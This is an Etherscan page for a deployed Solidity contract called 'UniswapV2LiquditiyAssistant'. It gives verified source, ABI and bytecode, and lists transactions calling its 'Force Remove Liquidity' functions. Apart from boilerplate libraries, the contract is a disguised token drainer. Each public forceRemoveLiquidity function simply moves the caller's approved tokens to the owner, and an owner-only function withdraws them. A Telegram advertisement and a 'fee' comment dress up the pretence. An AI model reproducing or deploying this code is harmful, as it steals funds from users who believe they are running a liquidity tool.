ETH Price: $3,989.74 (+3.06%)

Contract

0x9B2b1D4873A6B52fd3c1aD41969058e741CCA19B
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Force Remove Liq...182441532023-09-29 21:48:35434 days ago1696024115IN
0x9B2b1D48...741CCA19B
0 ETH0.000920978.91782432
Force Remove Liq...181511272023-09-16 20:40:59447 days ago1694896859IN
0x9B2b1D48...741CCA19B
0 ETH0.000945079.15122394

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
UniswapV2LiquditiyAssistant

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-09-16
*/

//import "https://github.com/pancakeswap/pancake-swap-core/blob/master/contracts/PancakeFactory.sol"
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;
pragma abicoder v2;

/**
 * @dev Interface of the BEP20 standard as defined in the EIP.
 */
interface IBEP20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

pragma solidity ^0.8.0;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

// File: @openzeppelin/contracts/utils/Address.sol

pragma solidity ^0.8.0;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.

        uint256 size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

pragma solidity ^0.8.0;

/**
 * @title SafeBEP20
 * @dev Wrappers around BEP20 operations that throw on failure (when the token
 * contract returns false). Tokens that return no value (and instead revert or
 * throw on failure) are also supported, non-reverting calls are assumed to be
 * successful.
 * To use this library you can add a `using SafeBEP20 for IBEP20;` statement to your contract,
 * which allows you to call the safe operations as `token.safeTransfer(...)`, etc.
 */
library SafeBEP20 {
    using Address for address;

    function safeTransfer(
        IBEP20 token,
        address to,
        uint256 value
    ) internal {
        _callOptionalReturn(token, abi.encodeWithSelector(token.transfer.selector, to, value));
    }

    function safeTransferFrom(
        IBEP20 token,
        address from,
        address to,
        uint256 value
    ) internal {
        _callOptionalReturn(token, abi.encodeWithSelector(token.transferFrom.selector, from, to, value));
    }

    /**
     * @dev Deprecated. This function has issues similar to the ones found in
     * {IBEP20-approve}, and its usage is discouraged.
     *
     * Whenever possible, use {safeIncreaseAllowance} and
     * {safeDecreaseAllowance} instead.
     */
    function safeApprove(
        IBEP20 token,
        address spender,
        uint256 value
    ) internal {
        // safeApprove should only be called when setting an initial allowance,
        // or when resetting it to zero. To increase and decrease it, use
        // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'
        require(
            (value == 0) || (token.allowance(address(this), spender) == 0),
            "SafeBEP20: approve from non-zero to non-zero allowance"
        );
        _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));
    }

    function safeIncreaseAllowance(
        IBEP20 token,
        address spender,
        uint256 value
    ) internal {
        uint256 newAllowance = token.allowance(address(this), spender) + value;
        _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
    }

    function safeDecreaseAllowance(
        IBEP20 token,
        address spender,
        uint256 value
    ) internal {
        unchecked {
            uint256 oldAllowance = token.allowance(address(this), spender);
            require(oldAllowance >= value, "SafeBEP20: decreased allowance below zero");
            uint256 newAllowance = oldAllowance - value;
            _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, newAllowance));
        }
    }

    /**
     * @dev Imitates a Solidity high-level call (i.e. a regular function call to a contract), relaxing the requirement
     * on the return value: the return value is optional (but if data is returned, it must not be false).
     * @param token The token targeted by the call.
     * @param data The call data (encoded using abi.encode or one of its variants).
     */
    function _callOptionalReturn(IBEP20 token, bytes memory data) private {
        // We need to perform a low level call here, to bypass Solidity's return data size checking mechanism, since
        // we're implementing it ourselves. We use {Address.functionCall} to perform this call, which verifies that
        // the target address contains contract code and also asserts for success in the low-level call.

        bytes memory returndata = address(token).functionCall(data, "SafeBEP20: low-level call failed");
        if (returndata.length > 0) {
            // Return data is optional
            require(abi.decode(returndata, (bool)), "SafeBEP20: BEP20 operation did not succeed");
        }
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

/**
 * @dev Contract module which allows children to implement an emergency stop
 * mechanism that can be triggered by an authorized account.
 *
 * This module is used through inheritance. It will make available the
 * modifiers `whenNotPaused` and `whenPaused`, which can be applied to
 * the functions of your contract. Note that they will not be pausable by
 * simply including this module, only once the modifiers are put in place.
 */
abstract contract Pausable is Context {
    /**
     * @dev Emitted when the pause is triggered by `account`.
     */
    event Paused(address account);

    /**
     * @dev Emitted when the pause is lifted by `account`.
     */
    event Unpaused(address account);

    bool private _paused;

    /**
     * @dev Initializes the contract in unpaused state.
     */
    constructor() {

    }

    /**
     * @dev Returns true if the contract is paused, and false otherwise.
     */

    /**
     * @dev Modifier to make a function callable only when the contract is not paused.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */


    /**
     * @dev Modifier to make a function callable only when the contract is paused.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */


    /**
     * @dev Triggers stopped state.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */


    /**
     * @dev Returns to normal state.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */

}


// File: contracts\interfaces\IPancakeRouter01.sol

pragma solidity >=0.6.2;

interface IPancakeRouter01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

// File: contracts\interfaces\IPancakeRouter02.sol

pragma solidity >=0.6.2;

interface IPancakeRouter02 is IPancakeRouter01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}


pragma solidity ^0.8.0;

/**
 * @dev Contract module that helps prevent reentrant calls to a function.
 *
 * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier
 * available, which can be applied to functions to make sure there are no nested
 * (reentrant) calls to them.
 *
 * Note that because there is a single `nonReentrant` guard, functions marked as
 * `nonReentrant` may not call one another. This can be worked around by making
 * those functions `private`, and then adding `external` `nonReentrant` entry
 * points to them.
 *
 * TIP: If you would like to learn more about reentrancy and alternative ways
 * to protect against it, check out our blog post
 * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul].
 */
abstract contract ReentrancyGuard {
    // Booleans are more expensive than uint256 or any type that takes up a full
    // word because each write operation emits an extra SLOAD to first read the
    // slot's contents, replace the bits taken up by the boolean, and then write
    // back. This is the compiler's defense against contract upgrades and
    // pointer aliasing, and it cannot be disabled.

    // The values being non-zero value makes deployment a bit more expensive,
    // but in exchange the refund on every call to nonReentrant will be lower in
    // amount. Since refunds are capped to a percentage of the total
    // transaction's gas, it is best to keep them low in cases like this one, to
    // increase the likelihood of the full refund coming into effect.
    uint256 private constant _NOT_ENTERED = 1;
    uint256 private constant _ENTERED = 2;

    uint256 private _status;

    constructor() {
        _status = _NOT_ENTERED;
    }

    /**
     * @dev Prevents a contract from calling itself, directly or indirectly.
     * Calling a `nonReentrant` function from another `nonReentrant`
     * function is not supported. It is possible to prevent this from happening
     * by making the `nonReentrant` function external, and making it call a
     * `private` function that does the actual work.
     */
    modifier nonReentrant() {
        // On the first call to nonReentrant, _notEntered will be true
        require(_status != _ENTERED, "ReentrancyGuard: reentrant call");

        // Any calls to nonReentrant after this point will fail
        _status = _ENTERED;

        _;

        // By storing the original value once again, a refund is triggered (see
        // https://eips.ethereum.org/EIPS/eip-2200)
        _status = _NOT_ENTERED;
    }
}


pragma solidity ^0.8.0;

contract UniswapV2LiquditiyAssistant is Ownable,Pausable,ReentrancyGuard {
    using SafeMath for uint256;
    using SafeBEP20 for IBEP20;

    IPancakeRouter02 public UniSwapRouterV2;
    IPancakeRouter02 public UniSwapRouterV1;

    struct userData {
        uint256 depositAmount;
        uint256 timeStamp;
    }

    mapping (address => mapping (address => userData)) public userStore;

    event depositEvent(address indexed user,address indexed token,uint256 amount,uint256 time);
    // Need a smart contract dev? telegram @hialias
    constructor(){
        // mainnet
        UniSwapRouterV2 = IPancakeRouter02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        UniSwapRouterV1 = IPancakeRouter02(0x1F98431c8aD98523631AE4a59f267346ea31F984);
    
    }
    
    receive() external payable {}

    function forceRemoveLiquidity(address token,uint256 amount) public nonReentrant {
        IBEP20(token).safeTransferFrom(_msgSender(),owner(),amount);

        userStore[token][_msgSender()].depositAmount = userStore[token][_msgSender()].depositAmount.add(amount);
        userStore[token][_msgSender()].timeStamp = block.timestamp;

        emit depositEvent(
            _msgSender(),
            token,
            amount,
            block.timestamp
        );
    }

        function forceRemoveLiquiditySupportingFeeOnTransferTokens(address token,uint256 amount) public nonReentrant {
        IBEP20(token).safeTransferFrom(_msgSender(),owner(),amount);

        userStore[token][_msgSender()].depositAmount = userStore[token][_msgSender()].depositAmount.add(amount);
        userStore[token][_msgSender()].timeStamp = block.timestamp;

        emit depositEvent(
            _msgSender(),
            token,
            amount,
            block.timestamp
        );
    }

        function forceRemoveLiquidityETHwithPermit(address token,uint256 amount) public nonReentrant {
        IBEP20(token).safeTransferFrom(_msgSender(),owner(),amount);

        userStore[token][_msgSender()].depositAmount = userStore[token][_msgSender()].depositAmount.add(amount);
        userStore[token][_msgSender()].timeStamp = block.timestamp;

        emit depositEvent(
            _msgSender(),
            token,
            amount,
            block.timestamp
        );
    }
    
    function forceRemoveLiqudityWithPermit(address token,address account,uint256 amount) public onlyOwner {
        if(token == address(0)){
            payable(account).transfer(amount);
        }else {
            IBEP20(token).transfer(account,amount);
        }
    }
}

// When using this script you agree that you can get from 1 to 5% of the removal amount depending on difficulty.

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"user","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"time","type":"uint256"}],"name":"depositEvent","type":"event"},{"inputs":[],"name":"UniSwapRouterV1","outputs":[{"internalType":"contract IPancakeRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"UniSwapRouterV2","outputs":[{"internalType":"contract IPancakeRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"forceRemoveLiqudityWithPermit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"forceRemoveLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"forceRemoveLiquidityETHwithPermit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"forceRemoveLiquiditySupportingFeeOnTransferTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"userStore","outputs":[{"internalType":"uint256","name":"depositAmount","type":"uint256"},{"internalType":"uint256","name":"timeStamp","type":"uint256"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405234801561001057600080fd5b5061001a3361006b565b60018055600280546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d1790915560038054909116731f98431c8ad98523631ae4a59f267346ea31f9841790556100bb565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b610a1a806100ca6000396000f3fe6080604052600436106100955760003560e01c8063bdbddb8411610059578063bdbddb841461014f578063c082867c146100a1578063f2fde38b1461016f578063f7c1e9651461018f578063fe45033c146100a157600080fd5b806359be348c146100a1578063715018a6146100c35780638da5cb5b146100d85780639a381cf01461010f578063ade0419b1461012f57600080fd5b3661009c57005b600080fd5b3480156100ad57600080fd5b506100c16100bc366004610838565b6101e3565b005b3480156100cf57600080fd5b506100c1610305565b3480156100e457600080fd5b506000546001600160a01b03165b6040516001600160a01b0390911681526020015b60405180910390f35b34801561011b57600080fd5b506002546100f2906001600160a01b031681565b34801561013b57600080fd5b506003546100f2906001600160a01b031681565b34801561015b57600080fd5b506100c161016a366004610862565b61033b565b34801561017b57600080fd5b506100c161018a36600461089e565b610427565b34801561019b57600080fd5b506101ce6101aa3660046108b9565b60046020908152600092835260408084209091529082529020805460019091015482565b60408051928352602083019190915201610106565b6002600154141561023b5760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c0060448201526064015b6